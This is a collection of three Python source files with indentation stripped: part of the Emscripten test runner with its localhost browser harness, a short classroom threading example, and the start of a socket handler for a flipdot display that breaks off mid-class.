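# may also contain None placeholders, so filter by the executable at index 0.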
if js_engines is None:
js_engines = shared.JS_ENGINES
for engine in js_engines:
assert type(engine) == list
for engine in self.banned_js_engines:
assert type(engine) in (list, type(None))
banned = [b[0] for b in self.banned_js_engines if b]
return [engine for engine in js_engines if engine and engine[0] not in banned]
def do_run_from_file(self, src, expected_output, *args, **kwargs):
if 'force_c' not in kwargs and os.path.splitext(src)[1] == '.c':
kwargs['force_c'] = True
logger.debug('do_run_from_file: %s' % src)
self.do_run(open(src).read(), open(expected_output).read(), *args, **kwargs)
def do_run_in_out_file_test(self, *path, **kwargs):
test_path = path_from_root(*path)
def find_files(*ext_list):
ret = None
count = 0
for ext in ext_list:
if os.path.isfile(test_path + ext):
ret = test_path + ext
count += 1
assert count > 0, ("No file found at {} with extension {}"
.format(test_path, ext_list))
assert count <= 1, ("Test file {} found with multiple valid extensions {}"
.format(test_path, ext_list))
return ret
src = find_files('.c', '.cpp')
output = find_files('.out', '.txt')
self.do_run_from_file(src, output, **kwargs)
## Does a complete test - builds, runs, checks output, etc.
def do_run(self, src, expected_output, args=[], output_nicerizer=None,
no_build=False, main_file=None, additional_files=[],
js_engines=None, post_build=None, basename='src.cpp', libraries=[],
includes=[], force_c=False, build_ll_hook=None,
assert_returncode=0, assert_identical=False, assert_all=False,
check_for_error=True):
if force_c or (main_file is not None and main_file[-2:] == '.c'):
basename = 'src.c'
if no_build:
if src:
js_file = src
else:
js_file = basename + '.o.js'
else:
dirname = self.get_dir()
filename = os.path.join(dirname, basename)
self.build(src, dirname, filename, main_file=main_file,
additional_files=additional_files, libraries=libraries,
includes=includes,
build_ll_hook=build_ll_hook, post_build=post_build)
js_file = filename + '.o.js'
self.assertExists(js_file)
engines = self.filtered_js_engines(js_engines)
# Make sure to get asm.js validation checks, using sm, even if not testing all vms.
if len(engines) > 1 and not self.use_all_engines:
if SPIDERMONKEY_ENGINE in engines and not self.is_wasm_backend():
engines = [SPIDERMONKEY_ENGINE]
else:
engines = engines[:1]
# In standalone mode, also add wasm vms as we should be able to run there too.
if self.get_setting('STANDALONE_WASM'):
# TODO once standalone wasm support is more stable, apply use_all_engines
# like with js engines, but for now as we bring it up, test in all of them
wasm_engines = shared.WASM_ENGINES
if len(wasm_engines) == 0:
logger.warning('no wasm engine was found to run the standalone part of this test')
engines += wasm_engines
if self.get_setting('WASM2C') and not EMTEST_LACKS_NATIVE_CLANG:
# compile the c file to a native executable.
c = shared.unsuffixed(js_file) + '.wasm.c'
executable = shared.unsuffixed(js_file) + '.exe'
cmd = [shared.CLANG_CC, c, '-o', executable] + clang_native.get_clang_native_args()
shared.run_process(cmd, env=clang_native.get_clang_native_env())
# we can now run the executable directly, without an engine, which
# we indicate with None as the engine
engines += [[None]]
if len(engines) == 0:
self.skipTest('No JS engine present to run this test with. Check %s and the paths therein.' % EM_CONFIG)
for engine in engines:
js_output = self.run_js(js_file, engine, args, output_nicerizer=output_nicerizer, assert_returncode=assert_returncode)
js_output = js_output.replace('\r\n', '\n')
if expected_output:
try:
if assert_identical:
self.assertIdentical(expected_output, js_output)
elif assert_all:
for o in expected_output:
self.assertContained(o, js_output)
else:
self.assertContained(expected_output, js_output)
if check_for_error:
self.assertNotContained('ERROR', js_output)
except Exception:
print('(test did not pass in JS engine: %s)' % engine)
raise
def get_freetype_library(self):
if '-Werror' in self.emcc_args:
self.emcc_args.remove('-Werror')
return self.get_library(os.path.join('third_party', 'freetype'), os.path.join('objs', '.libs', 'libfreetype.a'), configure_args=['--disable-shared', '--without-zlib'])
def get_poppler_library(self, env_init=None):
# The fontconfig symbols are all missing from the poppler build
# e.g. FcConfigSubstitute
self.set_setting('ERROR_ON_UNDEFINED_SYMBOLS', 0)
self.emcc_args += [
'-I' + path_from_root('tests', 'third_party', 'freetype', 'include'),
'-I' + path_from_root('tests', 'third_party', 'poppler', 'include')
]
freetype = self.get_freetype_library()
# Poppler has some pretty glaring warnings. Suppress them to keep the
# test output readable.
if '-Werror' in self.emcc_args:
self.emcc_args.remove('-Werror')
self.emcc_args += [
'-Wno-sentinel',
'-Wno-logical-not-parentheses',
'-Wno-unused-private-field',
'-Wno-tautological-compare',
'-Wno-unknown-pragmas',
]
env_init = env_init.copy() if env_init else {}
env_init['FONTCONFIG_CFLAGS'] = ' '
env_init['FONTCONFIG_LIBS'] = ' '
poppler = self.get_library(
os.path.join('third_party', 'poppler'),
[os.path.join('utils', 'pdftoppm.o'), os.path.join('utils', 'parseargs.o'), os.path.join('poppler', '.libs', 'libpoppler.a')],
env_init=env_init,
configure_args=['--disable-libjpeg', '--disable-libpng', '--disable-poppler-qt', '--disable-poppler-qt4', '--disable-cms', '--disable-cairo-output', '--disable-abiword-output', '--disable-shared'])
return poppler + freetype
def get_zlib_library(self):
if WINDOWS:
return self.get_library(os.path.join('third_party', 'zlib'), os.path.join('libz.a'),
configure=[path_from_root('emconfigure.bat')],
configure_args=['cmake', '.'],
make=['mingw32-make'],
make_args=[])
return self.get_library(os.path.join('third_party', 'zlib'), os.path.join('libz.a'), make_args=['libz.a'])
# Run a server and a web page. When a test runs, we tell the server about it,
# which tells the web page, which then opens a window with the test. Doing
# it this way then allows the page to close() itself when done.
def harness_server_func(in_queue, out_queue, port):
class TestServerHandler(SimpleHTTPRequestHandler):
# Request header handler for default do_GET() path in
# SimpleHTTPRequestHandler.do_GET(self) below.
def send_head(self):
if self.path.endswith('.js'):
path = self.translate_path(self.path)
try:
f = open(path, 'rb')
except IOError:
self.send_error(404, "File not found: " + path)
return None
self.send_response(200)
self.send_header('Content-type', 'application/javascript')
self.send_header('Connection', 'close')
self.end_headers()
return f
else:
return SimpleHTTPRequestHandler.send_head(self)
# Add COOP, COEP, CORP, and no-caching headers
def end_headers(self):
self.send_header('Access-Control-Allow-Origin', '*')
self.send_header('Cross-Origin-Opener-Policy', 'same-origin')
self.send_header('Cross-Origin-Embedder-Policy', 'require-corp')
self.send_header('Cross-Origin-Resource-Policy', 'cross-origin')
self.send_header('Cache-Control', 'no-cache, no-store, must-revalidate')
return SimpleHTTPRequestHandler.end_headers(self)
def do_GET(self):
if self.path == '/run_harness':
if DEBUG:
print('[server startup]')
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
self.wfile.write(open(path_from_root('tests', 'browser_harness.html'), 'rb').read())
elif 'report_' in self.path:
# the test is reporting its result. first change dir away from the
# test dir, as it will be deleted now that the test is finishing, and
# if we got a ping at that time, we'd return an error
os.chdir(path_from_root())
# for debugging, tests may encode the result and their own url (window.location) as result|url
if '|' in self.path:
path, url = self.path.split('|', 1)
else:
path = self.path
url = '?'
if DEBUG:
print('[server response:', path, url, ']')
if out_queue.empty():
out_queue.put(path)
else:
# a badly-behaving test may send multiple xhrs with reported results; we just care
# about the first (if we queued the others, they might be read as responses for
# later tests, or maybe the test sends more than one in a racy manner).
# we place 'None' in the queue here so that the outside knows something went wrong
# (none is not a valid value otherwise; and we need the outside to know because if we
# raise an error in here, it is just swallowed in python's webserver code - we want
# the test to actually fail, which a webserver response can't do).
out_queue.put(None)
raise Exception('browser harness error, excessive response to server - test must be fixed! "%s"' % self.path)
self.send_response(200)
self.send_header('Content-type', 'text/plain')
self.send_header('Cache-Control', 'no-cache, must-revalidate')
self.send_header('Connection', 'close')
self.send_header('Expires', '-1')
self.end_headers()
self.wfile.write(b'OK')
elif 'stdout=' in self.path or 'stderr=' in self.path or 'exception=' in self.path:
'''
To get logging to the console from browser tests, add this to
print/printErr/the exception handler in src/shell.html:
var xhr = new XMLHttpRequest();
xhr.open('GET', encodeURI('http://localhost:8888?stdout=' + text));
xhr.send();
'''
print('[client logging:', unquote_plus(self.path), ']')
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
elif self.path == '/check':
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
if not in_queue.empty():
# there is a new test ready to be served
url, dir = in_queue.get()
if DEBUG:
print('[queue command:', url, dir, ']')
assert in_queue.empty(), 'should not be any blockage - one test runs at a time'
assert out_queue.empty(), 'the single response from the last test was read'
# tell the browser to load the test
self.wfile.write(b'COMMAND:' + url)
# move us to the right place to serve the files for the new test
os.chdir(dir)
else:
# the browser must keep polling
self.wfile.write(b'(wait)')
else:
# Use SimpleHTTPServer default file serving operation for GET.
if DEBUG:
print('[simple HTTP serving:', unquote_plus(self.path), ']')
SimpleHTTPRequestHandler.do_GET(self)
def log_request(self, code=0, size=0):
# don't log; too noisy
pass
# allows streaming compilation to work
SimpleHTTPRequestHandler.extensions_map['.wasm'] = 'application/wasm'
httpd = HTTPServer(('localhost', port), TestServerHandler)
httpd.serve_forever() # test runner will kill us
class BrowserCore(RunnerCore):
# note how many tests hang / do not send an output. if many of these
# happen, likely something is broken and it is best to abort the test
# suite early, as otherwise we will wait for the timeout on every
# single test (hundreds of minutes)
MAX_UNRESPONSIVE_TESTS = 10
unresponsive_tests = 0
def __init__(self, *args, **kwargs):
super(BrowserCore, self).__init__(*args, **kwargs)
@staticmethod
def browser_open(url):
if not EMTEST_BROWSER:
logger.info('Using default system browser')
webbrowser.open_new(url)
return
browser_args = shlex.split(EMTEST_BROWSER)
# If the given browser is a scalar, treat it like one of the possible types
# from https://docs.python.org/2/library/webbrowser.html
if len(browser_args) == 1:
try:
# This throws if the type of browser isn't available
webbrowser.get(browser_args[0]).open_new(url)
logger.info('Using Emscripten browser: %s', browser_args[0])
return
except webbrowser.Error:
# Ignore the exception and fallback to the custom command logic
pass
# Else assume the given browser is a specific program with additional
# parameters and delegate to that
logger.info('Using Emscripten browser: %s', str(browser_args))
subprocess.Popen(browser_args + [url])
@classmethod
def setUpClass(cls):
super(BrowserCore, cls).setUpClass()
cls.also_asmjs = int(os.getenv('EMTEST_BROWSER_ALSO_ASMJS', '0')) == 1
cls.port = int(os.getenv('EMTEST_BROWSER_PORT', '8888'))
if not has_browser():
return
cls.browser_timeout = 60
cls.harness_in_queue = multiprocessing.Queue()
cls.harness_out_queue = multiprocessing.Queue()
cls.harness_server = multiprocessing.Process(target=harness_server_func, args=(cls.harness_in_queue, cls.harness_out_queue, cls.port))
cls.harness_server.start()
print('[Browser harness server on process %d]' % cls.harness_server.pid)
cls.browser_open('http://localhost:%s/run_harness' % cls.port)
@classmethod
def tearDownClass(cls):
super(BrowserCore, cls).tearDownClass()
if not has_browser():
return
cls.harness_server.terminate()
print('[Browser harness server terminated]')
if WINDOWS:
# On Windows, shutil.rmtree() in tearDown() raises this exception if we do not wait a bit:
# WindowsError: [Error 32] The process cannot access the file because it is being used by another process.
time.sleep(0.1)
def assert_out_queue_empty(self, who):
if not self.harness_out_queue.empty():
while not self.harness_out_queue.empty():
self.harness_out_queue.get()
raise Exception('excessive responses from %s' % who)
# @param tries_left: how many more times to try this test, if it fails. browser tests have
# many more causes of flakiness (in particular, they do not run
# synchronously, so we have a timeout, which can be hit if the VM
# we run on stalls temporarily), so we let each test try more than
# once by default
def run_browser(self, html_file, message, expectedResult=None, timeout=None, tries_left=1):
if not has_browser():
return
if BrowserCore.unresponsive_tests >= BrowserCore.MAX_UNRESPONSIVE_TESTS:
self.skipTest('too many unresponsive tests, skipping browser launch - check your setup!')
self.assert_out_queue_empty('previous test')
if DEBUG:
print('[browser launch:', html_file, ']')
if expectedResult is not None:
try:
self.harness_in_queue.put((
asbytes('http://localhost:%s/%s' % (self.port, html_file)),
self.get_dir()
))
received_output = False
output = '[no http server activity]'
start = time.time()
if timeout is None:
timeout = self.browser_timeout
while time.time() - start < timeout:
if not self.harness_out_queue.empty():
output = self.harness_out_queue.get()
received_output = True
break
time.sleep(0.1)
if not received_output:
BrowserCore.unresponsive_tests += 1
print('[unresponsive tests: %d]' % BrowserCore.unresponsive_tests)
if output is None:
# the browser harness reported an error already, and sent a None to tell
# us to also fail the test
raise Exception('failing test due to browser harness error')
if output.startswith('/report_result?skipped:'):
self.skipTest(unquote(output[len('/report_result?skipped:'):]).strip())
else:
# verify the result, and try again if we should do so
try:
self.assertIdenticalUrlEncoded(expectedResult, output)
except Exception as e:
if tries_left > 0:
print('[test error (see below), automatically retrying]')
print(e)
return self.run_browser(html_file, message, expectedResult, timeout, tries_left - 1)
else:
raise e
finally:
time.sleep(0.1) # see comment about Windows above
self.assert_out_queue_empty('this test')
else:
webbrowser.open_new(os.path.abspath(html_file))
print('A web browser window should have opened a page containing the results of a part of this test.')
print('You need to manually look at the page to see that it works ok: ' + message)
print('(sleeping for a bit to keep the directory alive for the web browser..)')
time.sleep(5)
print('(moving on..)')
def with_report_result(self, user_code):
return '''
#define EMTEST_PORT_NUMBER %(port)d
#include "%(report_header)s"
%(report_main)s
%(user_code)s
''' % {
'port': self.port,
'report_header': path_from_root('tests', 'report_result.h'),
'report_main': open(path_from_root('tests', 'report_result.cpp')).read(),
'user_code': user_code
}
# @manually_trigger If set, we do not assume we should run the reftest when main() is done.
# Instead, call doReftest() in JS yourself at the right time.
def reftest(self, expected, manually_trigger=False):
# make sure the pngs used here have no color correction, using e.g.
# pngcrush -rem gAMA -rem cHRM -rem iCCP -rem sRGB infile outfile
basename = os.path.basename(expected)
shutil.copyfile(expected, os.path.join(self.get_dir(), basename))
with open(os.path.join(self.get_dir(), 'reftest.js'), 'w') as out:
with open(path_from_root('tests', 'browser_reporting.js')) as reporting:
out.write('''
function doReftest() {
if (doReftest.done) return;
doReftest.done = true;
var img = new Image();
img.onload = function() {
assert(img.width == Module.canvas.width, 'Invalid width: ' + Module.canvas.width + ', should be ' + img.width);
assert(img.height == Module.canvas.height, 'Invalid height: ' + Module.canvas.height + ', should be ' + img.height);
var canvas = document.createElement('canvas');
canvas.width = img.width;
canvas.height = img.height;
var ctx = canvas.getContext('2d');
ctx.drawImage(img, 0, 0);
var expected = ctx.getImageData(0, 0, img.width, img.height).data;
var actualUrl = Module.canvas.toDataURL();
var actualImage = new Image();
actualImage.onload = function() {
/*
document.body.appendChild(img); // for comparisons
var div = document.createElement('div');
div.innerHTML = '^=expected, v=actual';
document.body.appendChild(div);
document.body.appendChild(actualImage); // to grab it for creating the test reference
*/
var actualCanvas = document.createElement('canvas');
actualCanvas.width = actualImage.width;
actualCanvas.height = actualImage.height;
var actualCtx = actualCanvas.getContext('2d');
actualCtx.drawImage(actualImage, 0, 0);
var actual = actualCtx.getImageData(0, 0, actualImage.width, actualImage.height).data;
var total = 0;
var width = img.width;
var height = img.height;
for (var x = 0; x < width; x++) {
for (var y = 0; y < height; y++) {
total += Math.abs(expected[y*width*4 + x*4 + 0] - actual[y*width*4 + x*4 + 0]);
total += Math.abs(expected[y*width*4 + x*4 + 1] - actual[y*width*4 + x*4 + 1]);
total += Math.abs(expected[y*width*4 + x*4 + 2] - actual[y*width*4 + x*4 + 2]);
}
}
var wrong = Math.floor(total / (img.width*img.height*3)); // floor, to allow some margin of error for antialiasing
// If the main JS file is in a worker, or modularize, then we need to supply our own reporting logic.
if (typeof reportResultToServer === 'undefined') {
(function() {
%s
reportResultToServer(wrong);
})();
} else {
reportResultToServer(wrong);
}
};
actualImage.src = actualUrl;
}
img.src = '%s';
};
// Automatically trigger the reftest?
if (!%s) {
// Yes, automatically
Module['postRun'] = doReftest;
if (typeof WebGLClient !== 'undefined') {
// trigger reftest from RAF as well, needed for workers where there is no pre|postRun on the main thread
var realRAF = window.requestAnimationFrame;
window.requestAnimationFrame = /** @suppress{checkTypes} */ (function(func) {
realRAF(function() {
func();
realRAF(doReftest);
});
});
// trigger reftest from canvas render too, for workers not doing GL
var realWOM = worker.onmessage;
worker.onmessage = function(event) {
realWOM(event);
if (event.data.target === 'canvas' && event.data.op === 'render') {
realRAF(doReftest);
}
};
}
} else {
// Manually trigger the reftest.
// The user will call it.
// Add an event loop iteration to ensure rendering, so users don't need to bother.
var realDoReftest = doReftest;
doReftest = function() {
setTimeout(realDoReftest, 1);
};
}
''' % (reporting.read(), basename, int(manually_trigger)))
def compile_btest(self, args):
run_process([EMCC] + args + ['--pre-js', path_from_root('tests', 'browser_reporting.js')])
def btest(self, filename, expected=None, reference=None, force_c=False,
reference_slack=0, manual_reference=False, post_build=None,
args=[], outfile='test.html', message='.', also_proxied=False,
url_suffix='', timeout=None, also_asmjs=False,
manually_trigger_reftest=False):
assert expected or reference, 'a btest must either expect an output, or have a reference image'
# if we are provided the source and not a path, use that
filename_is_src = '\n' in filename
src = filename if filename_is_src else ''
original_args = args[:]
if 'WASM=0' not in args:
# Filter out separate-asm, which is implied by wasm
args = [a for a in args if a != '--separate-asm']
# add in support for reporting results. this adds as an include a header so testcases can
# use REPORT_RESULT, and also adds a cpp file to be compiled alongside the testcase, which
# contains the implementation of REPORT_RESULT (we can't just include that implementation in
# the header as there may be multiple files being compiled here).
args += ['-DEMTEST_PORT_NUMBER=%d' % self.port,
'-include', path_from_root('tests', 'report_result.h'),
path_from_root('tests', 'report_result.cpp')]
if filename_is_src:
filepath = os.path.join(self.get_dir(), 'main.c' if force_c else 'main.cpp')
with open(filepath, 'w') as f:
f.write(src)
else:
filepath = path_from_root('tests', filename)
if reference:
self.reference = reference
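# reference_slack is the largest average per-channel pixel difference (the
# value reftest.js reports back) that still counts as a pass, so accept 0..slack.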
expected = [str(i) for i in range(0, reference_slack + 1)]
self.reftest(path_from_root('tests', reference), manually_trigger=manually_trigger_reftest)
if not manual_reference:
args = args + ['--pre-js', 'reftest.js', '-s', 'GL_TESTING=1']
all_args = ['-s', 'IN_TEST_HARNESS=1', filepath, '-o', outfile] + args
# print('all args:', all_args)
try_delete(outfile)
self.compile_btest(all_args)
self.assertExists(outfile)
if post_build:
post_build()
if not isinstance(expected, list):
expected = [expected]
self.run_browser(outfile + url_suffix, message, ['/report_result?' + e for e in expected], timeout=timeout)
# Tests can opt into being run under asmjs as well
if 'WASM=0' not in args and (also_asmjs or self.also_asmjs):
print('WASM=0')
self.btest(filename, expected, reference, force_c, reference_slack, manual_reference, post_build,
original_args + ['-s', 'WASM=0'], outfile, message, also_proxied=False, timeout=timeout)
if also_proxied:
print('proxied...')
if reference:
assert not manual_reference
manual_reference = True
assert not post_build
post_build = self.post_manual_reftest
# run proxied
self.btest(filename, expected, reference, force_c, reference_slack, manual_reference, post_build,
original_args + ['--proxy-to-worker', '-s', 'GL_TESTING=1'], outfile, message, timeout=timeout)
###################################################################################################
def build_library(name,
build_dir,
output_dir,
generated_libs,
configure=['sh', './configure'],
configure_args=[],
make=['make'],
make_args=[],
cache=None,
cache_name=None,
env_init={},
native=False,
cflags=[]):
"""Build a library and cache the result. We build the library file
once and cache it for all our tests. (We cache in memory since the test
directory is destroyed and recreated for each test. Note that we cache
separately for different compilers.) This cache lasts only for the duration of
the test run. There is a different concept of caching as well; see |Cache|.
"""
if type(generated_libs) is not list:
generated_libs = [generated_libs]
source_dir = path_from_root('tests', name.replace('_native', ''))
temp_dir = build_dir
project_dir = os.path.join(temp_dir, name)
if os.path.exists(project_dir):
shutil.rmtree(project_dir)
shutil.copytree(source_dir, project_dir) # Sometimes useful when debugging to comment this out, along with the two lines above
generated_libs = [os.path.join(project_dir, lib) for lib in generated_libs]
if native:
env = clang_native.get_clang_native_env()
else:
env = building.get_building_env(cflags=cflags)
for k, v in env_init.items():
env[k] = v
if configure:
try:
with open(os.path.join(project_dir, 'configure_out'), 'w') as out:
with open(os.path.join(project_dir, 'configure_err'), 'w') as err:
stdout = out if EM_BUILD_VERBOSE < 2 else None
stderr = err if EM_BUILD_VERBOSE < 1 else None
building.configure(configure + configure_args, env=env,
stdout=stdout,
stderr=stderr,
cwd=project_dir)
except subprocess.CalledProcessError:
with open(os.path.join(project_dir, 'configure_out')) as f:
print('-- configure stdout --')
print(f.read())
print('-- end configure stdout --')
with open(os.path.join(project_dir, 'configure_err')) as f:
print('-- configure stderr --')
print(f.read())
print('-- end configure stderr --')
raise
def open_make_out(mode='r'):
return open(os.path.join(project_dir, 'make.out'), mode)
def open_make_err(mode='r'):
return open(os.path.join(project_dir, 'make.err'), mode)
if EM_BUILD_VERBOSE >= 3:
make_args += ['VERBOSE=1']
try:
with open_make_out('w') as make_out:
with open_make_err('w') as make_err:
stdout = make_out if EM_BUILD_VERBOSE < 2 else None
stderr = make_err if EM_BUILD_VERBOSE < 1 else None
building.make(make + make_args, stdout=stdout, stderr=stderr, env=env,
cwd=project_dir)
except subprocess.CalledProcessError:
with open_make_out() as f:
print('-- make stdout --')
print(f.read())
print('-- end make stdout --')
with open_make_err() as f:
print('-- make stderr --')
print(f.read())
print('-- end make stderr --')
raise
if cache is not None:
cache[cache_name] = []
for f in generated_libs:
basename = os.path.basename(f)
cache[cache_name].append((basename, open(f, 'rb').read()))
return generated_libs
def check_js_engines():
working_engines = list(filter(jsrun.check_engine, shared.JS_ENGINES))
if len(working_engines) < len(shared.JS_ENGINES):
print('Not all of the JS engines in JS_ENGINES appear to work.')
exit(1)
if EMTEST_ALL_ENGINES:
print('(using ALL js engines)')
else:
logger.warning('use EMTEST_ALL_ENGINES=1 in the env to run against all JS '
'engines, which is slower but provides more coverage')
def get_and_import_modules():
modules = []
for filename in glob.glob(os.path.join(os.path.dirname(__file__), 'test*.py')):
module_dir, module_file = os.path.split(filename)
module_name, module_ext = os.path.splitext(module_file)
__import__(module_name)
modules.append(sys.modules[module_name])
return modules
def get_all_tests(modules):
# Create a list of all known tests so that we can choose from them based on a wildcard search
all_tests = []
suites = core_test_modes + non_core_test_modes
for m in modules:
for s in suites:
if hasattr(m, s):
tests = [t for t in dir(getattr(m, s)) if t.startswith('test_')]
all_tests += [s + '.' + t for t in tests]
return all_tests
def tests_with_expanded_wildcards(args, all_tests):
# Process wildcards, e.g. "browser.test_pthread_*" should expand to list all pthread tests
new_args = []
for i, arg in enumerate(args):
if '*' in arg:
if arg.startswith('skip:'):
arg = arg[5:]
matching_tests = fnmatch.filter(all_tests, arg)
new_args += ['skip:' + t for t in matching_tests]
else:
new_args += fnmatch.filter(all_tests, arg)
else:
new_args += [arg]
if not new_args and args:
print('No tests found to run in set: ' + str(args))
sys.exit(1)
return new_args
def skip_requested_tests(args, modules):
for i, arg in enumerate(args):
if arg.startswith('skip:'):
which = [arg.split('skip:')[1]]
print(','.join(which), file=sys.stderr)
for test in which:
print('will skip "%s"' % test, file=sys.stderr)
suite_name, test_name = test.split('.')
for m in modules:
try:
suite = getattr(m, suite_name)
setattr(suite, test_name, lambda s: s.skipTest("requested to be skipped"))
break
except AttributeError:
pass
args[i] = None
return [a for a in args if a is not None]
def args_for_random_tests(args, modules):
if not args:
return args
first = args[0]
if first.startswith('random'):
random_arg = first[6:]
num_tests, base_module, relevant_modes = get_random_test_parameters(random_arg)
for m in modules:
if hasattr(m, base_module):
base = getattr(m, base_module)
new_args = choose_random_tests(base, num_tests, relevant_modes)
print_random_test_statistics(num_tests)
return new_args
return args
def get_random_test_parameters(arg):
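# arg is whatever followed 'random' on the command line, e.g. '' (one core
# test), '7', 'other3' or 'browser5'.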
num_tests = 1
base_module = default_core_test_mode
relevant_modes = core_test_modes
if len(arg):
num_str = arg
if arg.startswith('other'):
base_module = 'other'
relevant_modes = ['other']
num_str = arg.replace('other', '')
elif arg.startswith('browser'):
base_module = 'browser'
relevant_modes = ['browser']
num_str = arg.replace('browser', '')
num_tests = int(num_str)
return num_tests, base_module, relevant_modes
def choose_random_tests(base, num_tests, relevant_modes):
tests = [t for t in dir(base) if t.startswith('test_')]
print()
chosen = set()
while len(chosen) < num_tests:
test = random.choice(tests)
mode = random.choice(relevant_modes)
new_test = mode + '.' + test
before = len(chosen)
chosen.add(new_test)
if len(chosen) > before:
print('* ' + new_test)
else:
# we may have hit the limit
if len(chosen) == len(tests) * len(relevant_modes):
print('(all possible tests chosen! %d = %d*%d)' % (len(chosen), len(tests), len(relevant_modes)))
break
return list(chosen)
def print_random_test_statistics(num_tests):
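# 0.5 / sqrt(num_tests) is the worst-case (p = 0.5) standard deviation of a
# sample proportion; the message below allows one standard deviation of slack.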
std = 0.5 / math.sqrt(num_tests)
expected = 100.0 * (1.0 - std)
print()
print('running those %d randomly-selected tests. if they all pass, then there is a '
'greater than 95%% chance that at least %.2f%% of the test suite will pass'
% (num_tests, expected))
print()
def show():
print('if all tests passed then there is a greater than 95%% chance that at least '
'%.2f%% of the test suite will pass'
% (expected))
atexit.register(show)
def load_test_suites(args, modules):
loader = unittest.TestLoader()
unmatched_test_names = set(args)
suites = []
for m in modules:
names_in_module = []
for name in list(unmatched_test_names):
try:
operator.attrgetter(name)(m)
names_in_module.append(name)
unmatched_test_names.remove(name)
except AttributeError:
pass
if len(names_in_module):
loaded_tests = loader.loadTestsFromNames(sorted(names_in_module), m)
tests = flattened_tests(loaded_tests)
suite = suite_for_module(m, tests)
for test in tests:
suite.addTest(test)
suites.append((m.__name__, suite))
return suites, unmatched_test_names
def flattened_tests(loaded_tests):
tests = []
for subsuite in loaded_tests:
for test in subsuite:
tests.append(test)
return tests
def suite_for_module(module, tests):
suite_supported = module.__name__ in ('test_core', 'test_other')
if not EMTEST_SAVE_DIR:
has_multiple_tests = len(tests) > 1
has_multiple_cores = parallel_testsuite.num_cores() > 1
if suite_supported and has_multiple_tests and has_multiple_cores:
return parallel_testsuite.ParallelTestSuite(len(tests))
return unittest.TestSuite()
def run_tests(options, suites):
resultMessages = []
num_failures = 0
print('Test suites:')
print([s[0] for s in suites])
# Run the discovered tests
testRunner = unittest.TextTestRunner(verbosity=2)
for mod_name, suite in suites:
print('Running %s: (%s tests)' % (mod_name, suite.countTestCases()))
res = testRunner.run(suite)
msg = ('%s: %s run, %s errors, %s failures, %s skipped' %
(mod_name, res.testsRun, len(res.errors), len(res.failures), len(res.skipped)))
num_failures += len(res.errors) + len(res.failures)
resultMessages.append(msg)
if len(resultMessages) > 1:
print('====================')
print()
print('TEST SUMMARY')
for msg in resultMessages:
print(' ' + msg)
# Return the number of failures as the process exit code for automating success/failure reporting.
return min(num_failures, 255)
def parse_args(args):
parser = argparse.ArgumentParser(prog='runner.py', description=__doc__)
parser.add_argument('tests', nargs='*')
return parser.parse_args()
def main(args):
options = parse_args(args)
check_js_engines()
def prepend_default(arg):
if arg.startswith('test_'):
return default_core_test_mode + '.' + arg
return arg
tests = [prepend_default(t) for t in options.tests]
modules = get_and_import_modules()
all_tests = get_all_tests(modules)
tests = tests_with_expanded_wildcards(tests, all_tests)
tests = skip_requested_tests(tests, modules)
tests = args_for_random_tests(tests, modules)
suites, unmatched_tests = load_test_suites(tests, modules)
if unmatched_tests:
print('ERROR: could not find the following tests: ' + ' '.join(unmatched_tests))
return 1
return run_tests(options, suites)
if __name__ == '__main__':
try:
sys.exit(main(sys.argv))
except KeyboardInterrupt:
logger.warning('KeyboardInterrupt')
sys.exit(1)
|
aula_sd.py
|
# -*- coding: utf-8 -*-
"""
Spyder Editor
This is a temporary script file.
"""
# distributed systems class, 24/09/2018
import threading
import time
'''
def seu_coracao():
print ('<3')
return
threads = []
for i in range(5):
t = threading.Thread(target=seu_coracao)
threads.append(t)
t.start()
def ola_mundo(numero1, numero2):
print('numbers: %s %s' % (numero1, numero2))
print('result = %d' % (int(numero1) + int(numero2)))
return
t = threading.Thread(target=ola_mundo, args=(2, 3))
t.start()
def ola_mundo(numero1, numero2):
print('numbers: %s %s' % (numero1, numero2))
print('result = %d' % (int(numero1) + int(numero2)))
return
threads = []
for i in range(5):
t = threading.Thread(target=ola_mundo, args=(2, 1))
threads.append(t)
t.start()
'''
def funcao():
print(threading.currentThread().getName(), ' starting')
time.sleep(2)
print(threading.currentThread().getName(), ' finishing')
return
t = threading.Thread(target=funcao)  # uses the thread's default name
t.start()
|
handler.py
|
"""
Handlers that handle data streams from a UDP/TCP socket or RS485 port.
The main use for these is with the simulator, but the TCPHandler, for example, can also be used to forward data to a Display initialised with RS485 clients - providing the same functionality as an Ethernet/RS485 device.
"""
import threading
import serial
import socketserver
class Handler(socketserver.BaseRequestHandler):
"""
Base flipdot network socket handler - overloaded with TCPHandler and UDPHandler
"""
def __init__(self, update_fn):
"""
Overload __init__ in order to pass a function that will do a display update - physical or sim.
The overload means the required BaseRequestHandler args are not passed here; __call__ is overloaded in the extended classes, however, which instantiates the StreamRequestHandler with those args and the new class
:param update_fn function: pointer to function that takes bytearray and sends to display
"""
self.update_fn = update_fn
# overloading __call__ allows us to pass the update_fn instance to the handler when created by the server: https://stackoverflow.com/a/45233774/3959671
def __call__(self, request, client_address, server):
h = Handler(self.update_fn)
socketserver.StreamRequestHandler.__init__(h, request, client_address, server)
def handle(self):
"""
Will be overloaded by extended classes below
"""
pass
@staticmethod
def isvalid(data: bytearray):
"""
Checks that the data received is valid for an AlfaZeta display
:param data bytearray: data to be checked
:rtype bool: True if valid, False if not
"""
if data[0] != 0x80:
print("no start")
return False
if data[1] not in {0x81, 0x82, 0x83, 0x84, 0x85, 0x86}:
print("not right command")
return False
ln = 0
if data[1] in {0x81, 0x82}:
ln = 112
elif data[1] in {0x83, 0x84}:
ln = 28
elif data[1] in {0x85, 0x86}:
ln = 56
if len(data) != (ln + 4):
print("bad length", len(data))
return False
if data[-1] != 0x8F:
print("no end")
return False
return True
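# For illustration only (inferred from the checks above, not from vendor docs):
# a frame is 0x80, a command byte in 0x81-0x86, one further header byte
# (presumably the display address), then 112/28/56 data bytes depending on the
# command, and a closing 0x8F. E.g. a 28-byte frame for command 0x83:
#   frame = bytearray([0x80, 0x83, 0x00]) + bytearray(28) + bytearray([0x8F])
#   assert Handler.isvalid(frame)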
@staticmethod
def update_display(data, update_fn):
"""
Update display using passed update_fn; forwards bytearray to display - allows usage with sim or physical
We could just call update_fn directly in the Handler class, but this wrapper gives us a place for any pre/post-processing
"""
update_fn(data)
class TCPHandler(Handler):
# overloading __call__ allows us to pass the update_fn instance to the handler when created by the server: https://stackoverflow.com/a/45233774/3959671
def __call__(self, request, client_address, server):
